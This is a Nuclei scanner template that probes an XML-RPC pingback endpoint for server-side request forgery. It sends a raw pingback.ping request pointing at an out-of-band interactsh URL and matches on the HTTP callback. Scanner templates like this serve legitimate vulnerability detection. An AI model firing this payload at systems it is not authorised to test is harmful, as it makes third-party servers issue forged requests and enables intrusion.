nuclei-templates/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml

33 lines
713 B
YAML

id: xmlrpc-pingback-ssrf
info:
name: XMLRPC Pingback SSRF
author: geeknik
severity: high
reference:
- https://hackerone.com/reports/406387
tags: ssrf,generic,xmlrpc
requests:
- raw:
- |
POST /xmlrpc/pingback HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value>http://{{interactsh-url}}</value>
</param>
</params>
</methodCall>
matchers:
- type: word
part: interactsh_protocol
words:
- "http"